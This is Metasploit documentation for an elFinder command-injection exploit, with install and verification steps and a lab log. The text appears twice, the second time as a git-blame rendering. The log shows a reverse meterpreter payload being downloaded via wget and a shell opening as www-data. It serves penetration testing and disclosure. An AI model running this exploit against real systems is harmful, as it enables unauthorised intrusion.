documentation/modules/exploit/linux/http/elfinder_archive_cmd_injection.md

## Vulnerable Application

elFinder versions below 2.1.59 are vulnerable to a command injection
vulnerability via its archive functionality.

When creating a new zip archive, the `name` parameter is sanitized
with the `escapeshellarg()` php function and then passed to the
`zip` utility. Despite the sanitization, supplying the `-TmTT`
argument as part of the `name` parameter is still permitted and
enables the execution of arbitrary commands as the `www-data` user.

Tested on elFinder versions `2.1.57`, `2.1.58`, and `2.1.59`.

### Installation Steps

1. Set up a php server
2. Download a vulnerable version of the elFinder [software](https://github.com/Studio-42/elFinder/archive/2.1.58.zip)
3. Rename the minimal connector file: `mv /php/connector.minimal.php-dist /php/connector.minimal.php`
4. Access the software at `http://<host>/elfinder.html`

Additional installation methods can be found [here](https://github.com/Studio-42/elFinder#installation).

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/elfinder_archive_cmd_injection`
4. Do: `set RHOST <ip>`
5. Do: `set LHOST <ip>`
6. Do: `run`
7. You should get a meterpreter session.

## Scenarios

### elFinder `v2.1.58` on Ubuntu 20.04.1

```
msf > use exploit/linux/http/elfinder_archive_cmd_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf exploit(linux/http/elfinder_archive_cmd_injection) > set rhost 192.168.140.128
rhost => 192.168.140.128
msf exploit(linux/http/elfinder_archive_cmd_injection) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf exploit(linux/http/elfinder_archive_cmd_injection) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. elFinder running version 2.1.58
[*] Uploading file LojGHIOkAW.txt to elFinder
[+] Text file was successfully uploaded!
[*] Attempting to create archive fMuuXCkA.zip
[+] Archive was successfully created!
[*] Using URL: http://0.0.0.0:8080/OR3Kz5kxLZp
[*] Local IP: http://192.168.1.199:8080/OR3Kz5kxLZp
[*] Client 192.168.140.128 (Wget/1.20.3 (linux-gnu)) requested /OR3Kz5kxLZp
[*] Sending payload to 192.168.140.128 (Wget/1.20.3 (linux-gnu))
[*] Command Stager progress -  62.50% done (75/120 bytes)
[*] Command Stager progress -  89.17% done (107/120 bytes)
[*] Sending stage (984904 bytes) to 192.168.140.128
[+] Deleted LojGHIOkAW.txt
[+] Deleted fMuuXCkA.zip
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.128:39822) at 2021-09-09 16:10:06 -0500
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: www-data @ ubuntu (uid=33, gid=33, euid=33, egid=33)
meterpreter > sysinfo
Computer     : 192.168.140.128
OS           : Ubuntu 20.04 (Linux 5.11.0-27-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
```
add completed module and documentation 2021-09-09 16:58:40 -05:00			`## Vulnerable Application`

			`elFinder versions below 2.1.59 are vulnerable to a command injection`
			`vulnerability via its archive functionality.`

			When creating a new zip archive, the `name` parameter is sanitized
escapeshellcmd -> escapeshellarg 2021-09-09 17:28:05 -05:00			with the `escapeshellarg()` php function and then passed to the
add completed module and documentation 2021-09-09 16:58:40 -05:00			`zip` utility. Despite the sanitization, supplying the `-TmTT`
			argument as part of the `name` parameter is still permitted and
			enables the execution of arbitrary commands as the `www-data` user.

			Tested on elFinder versions `2.1.57`, `2.1.58`, and `2.1.59`.

			`### Installation Steps`

			`1. Set up a php server`
			`2. Download a vulnerable version of the elFinder [software](https://github.com/Studio-42/elFinder/archive/2.1.58.zip)`
			3. Rename the minimal connector file: `mv /php/connector.minimal.php-dist /php/connector.minimal.php`
			4. Access the software at `http://<host>/elfinder.html`

			`Additional installation methods can be found [here](https://github.com/Studio-42/elFinder#installation).`

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: `use exploit/linux/http/elfinder_archive_cmd_injection`
			4. Do: `set RHOST <ip>`
			5. Do: `set LHOST <ip>`
			6. Do: `run`
			`7. You should get a meterpreter session.`

			`## Scenarios`

			### elFinder `v2.1.58` on Ubuntu 20.04.1

			```
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf > use exploit/linux/http/elfinder_archive_cmd_injection`
add completed module and documentation 2021-09-09 16:58:40 -05:00			`[*] Using configured payload linux/x86/meterpreter/reverse_tcp`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/elfinder_archive_cmd_injection) > set rhost 192.168.140.128`
add completed module and documentation 2021-09-09 16:58:40 -05:00			`rhost => 192.168.140.128`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/elfinder_archive_cmd_injection) > set lhost 192.168.140.1`
add completed module and documentation 2021-09-09 16:58:40 -05:00			`lhost => 192.168.140.1`
Updates docs to reflect new default prompt 2025-07-17 09:53:40 +01:00			`msf exploit(linux/http/elfinder_archive_cmd_injection) > run`
add completed module and documentation 2021-09-09 16:58:40 -05:00
			`[*] Started reverse TCP handler on 192.168.140.1:4444`
			`[*] Running automatic check ("set AutoCheck false" to disable)`
			`[+] The target appears to be vulnerable. elFinder running version 2.1.58`
			`[*] Uploading file LojGHIOkAW.txt to elFinder`
			`[+] Text file was successfully uploaded!`
			`[*] Attempting to create archive fMuuXCkA.zip`
			`[+] Archive was successfully created!`
			`[*] Using URL: http://0.0.0.0:8080/OR3Kz5kxLZp`
			`[*] Local IP: http://192.168.1.199:8080/OR3Kz5kxLZp`
			`[*] Client 192.168.140.128 (Wget/1.20.3 (linux-gnu)) requested /OR3Kz5kxLZp`
			`[*] Sending payload to 192.168.140.128 (Wget/1.20.3 (linux-gnu))`
			`[*] Command Stager progress - 62.50% done (75/120 bytes)`
			`[*] Command Stager progress - 89.17% done (107/120 bytes)`
			`[*] Sending stage (984904 bytes) to 192.168.140.128`
			`[+] Deleted LojGHIOkAW.txt`
			`[+] Deleted fMuuXCkA.zip`
			`[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.128:39822) at 2021-09-09 16:10:06 -0500`
			`[*] Command Stager progress - 100.00% done (120/120 bytes)`
			`[*] Server stopped.`

			`meterpreter > getuid`
			`Server username: www-data @ ubuntu (uid=33, gid=33, euid=33, egid=33)`
			`meterpreter > sysinfo`
			`Computer : 192.168.140.128`
			`OS : Ubuntu 20.04 (Linux 5.11.0-27-generic)`
			`Architecture : x64`
			`BuildTuple : i486-linux-musl`
			`Meterpreter : x86/linux`
			```